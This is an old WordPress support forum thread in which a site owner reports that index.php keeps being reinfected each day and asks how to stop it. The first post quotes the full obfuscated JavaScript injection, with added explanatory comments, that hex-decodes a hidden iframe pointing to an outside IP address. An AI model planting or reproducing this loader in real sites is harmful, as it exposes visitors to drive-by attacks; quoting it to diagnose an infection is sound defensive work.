
Something rewrites my index.php files - daily (4 posts)

  1. deWINTER
    Member
    Posted 4 years ago #

    Hi,

    Something keeps rewriting my index.php files in the root of my wordpress installation and in the wordpress folder itself. On a DAILY basis.
    I keep replacing the files with a clean version, but it comes back the next day, causing Safari to tell me that my site may harm my computer.
    The code I get is this:

    <script>
    // Injected loader script, quoted here as the poster found it in index.php.
    // Reading top to bottom: it hides `eval`, `parseInt` and `String.fromCharCode`
    // behind string concatenation, hex-decodes one long string, and writes the
    // decoded markup into the page with document.write().
    // NOTE(review): nothing in this sample writes files; the daily re-injection
    // described in the post must come from a separate server-side path that is
    // not visible here (presumably a leftover backdoor or reused credentials).

    // Empty string. It is concatenated into literals below, which splits
    // keywords and the hex payload without changing their value.
    c10zf0='';
    // Alias for `document`; the embedded block comment appears to be filler.
    y383d2d0=/* ye455a75d646 */document;
    // Writes a helper <script> that defines y6c83f2(x) { return eval(x); }.
    // Both the tag name ('<scr'+'ipt>') and the word "eval" ('e'+''+'val') are
    // split, so neither appears as a contiguous string in the infected file.
    y383d2d0.write('<scr'+'ipt>function y6c83f2(ya5aec4){return e'+c10zf0+'val(ya5aec4);}</scr'+'ipt>');  
    
    // Hex-to-number helper: eval('parseInt') yields the parseInt function, which
    // is then called with radix 16 on the argument.
    function c10b010268y721250a5ae(y79f81){
    	var z402='';
    	return (y6c83f2('p'+z402+'arseInt')(y79f81,16));
    	}
    
    // Hex-string decoder: walks the input two characters at a time, converts each
    // pair with the helper above and appends String.fromCharCode(value).
    // y8331c4b, y4037b0b01 and y2cb0547 are assigned without `var`, so they
    // become globals on the infected page.
    function y1790bb112e(yc7061){
    	var yd068f7cd='';
    	y8331c4b='fromCh';
    	y4037b0b01=String[y8331c4b+'arCode'];
    	for(y2cb0547=0;y2cb0547<yc7061.length;y2cb0547+=2){
    		yd068f7cd+=(y4037b0b01(c10b010268y721250a5ae(yc7061.substr(y2cb0547,2))));
    		}
    	return yd068f7cd;
    	} 
    
    // Hex-encoded payload, broken up with the empty c10zf0 string. Decoded by
    // hand it is a second <script>: if the global `myia` is not yet truthy it
    // calls document.write(unescape('...')) on a percent-encoded <iframe name=c10>
    // styled visibility:hidden, then sets `var myia=true` so the frame is written
    // only once per page. The iframe src decodes to (defanged)
    // hxxp://212[.]174[.]200[.]120/.dif/go.php?sid=1 plus a trailing suffix.
    // For triage: the payload begins with 3C7363726970743E, the hex of "<script>",
    // which together with the split '<scr'+'ipt>' literal is a usable search
    // string across the other files of the install.
    var y8b79f97f6='3C7363726970743E69662821'+c10zf0+'6D796961'+c10zf0+'297B646F63756D656E742E777269746528756E65736361'+c10zf0+'7065282027253363253639253636253732253631'+c10zf0+'253664253635253230253665253631'+c10zf0+'253664253635253364253633253331'+c10zf0+'253330253230253733253732253633253364253237253638253734253734253730253361'+c10zf0+'253266253266253332253331'+c10zf0+'253332253265253331'+c10zf0+'253337253334253265253332253330253330253265253331'+c10zf0+'253332253330253266253265253634253639253636253266253637253666253265253730253638253730253366253733253639253634253364253331'+c10zf0+'26253237253262253464253631'+c10zf0+'253734253638253265253732253666253735253665253634253238253464253631'+c10zf0+'253734253638253265253732253631'+c10zf0+'253665253634253666253664253238253239253261'+c10zf0+'253335253331'+c10zf0+'253330253334253332253239253262253237253635253334253634253237253230253737253639253634253734253638253364253331'+c10zf0+'253334253331'+c10zf0+'253230253638253635253639253637253638253734253364253333253336253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c10zf0+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c10zf0+'2536642536352533652729293B7D7661'+c10zf0+'72206D796961'+c10zf0+'3D747275653B3C2F7363726970743E';
    // Decodes the payload and writes the resulting <script> into the document.
    y383d2d0.write(y1790bb112e(y8b79f97f6));
    </script>

    Any idea what I can do to get this nonsense to stop? I checked over all of my files, users, database, to see if there is anything wrong, but apart from that code everything seems fine.

    I use these plugins: Akismet, NextGEN Gallery, Dagon Design Form Mailer and Google XML Sitemaps.
    WordPress version is 2.8.4.

    Any help will be greatly appreciated, thank you.

    Jo

  2. Samuel B
    moderator
    Posted 4 years ago #

  3. deWINTER
    Member
    Posted 4 years ago #

    I know.
    And I already did a lot of the stuff you should do when you have been hacked.

    • Kicked out the admin user and replaced it with a real name
    • Moved the entire wordpress installation to a different folder, and reinstalled the lot with a fresh copy
    • Locked down the wp-config file with some .htaccess stuff
    • Taken out the bit in the header that says what version of wordpress you use
    • Put in a blank index.html file in the plugin folder
    • etc ....

    Now, what I would like to know is, what do I do next? I have run out of ideas.
    Thanks,

    Jo.

  4. Samuel B
    moderator
    Posted 4 years ago #

    look at my 2nd link
